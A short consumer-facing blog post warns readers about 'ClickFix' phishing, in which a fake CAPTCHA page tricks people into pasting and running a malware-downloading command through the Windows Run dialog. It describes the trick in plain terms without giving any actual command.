ClickFix attacks are a new phishing attack that actually uses your trusting nature against you to actually help the scammers do their dirty work.
Know those little boxes that pop up on websites that make us prove we are a human and not a robot? These are called Captcha boxes. And they are called that for a reason. It is actually an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”.
How the scam works is you get a link in an email with a link. You open the link and you get a page that displays a Captcha test similar to the above. However, this one comes with some special instructions…
Here, you don’t just have to check a box, or select a bunch of the pictures that have a motorcycle in it, you are asked to do some stuff on your keyboard.
In this example they trying to get you to open a prompt on your computer that takes instructions, called the Run Command. You press CTRL+V and this pastes a command that has been put into your clipboard. Pressing Enter, actually runs the command on your computer.
So, you basically just ran a command on your computer for the scammers. What that command does is utilize a part of your system to start downloading malware from a website.
Same Thing, Different Presentation
There are multiple variations of this scam but they all pretty much act the same way. They might just start off a bit differently. Here are are samples to keep any eye out for;
You see there are multiple ways to pull of this scam. Always remember the 4 P’s when opening strange links and whenever you encounter something different.
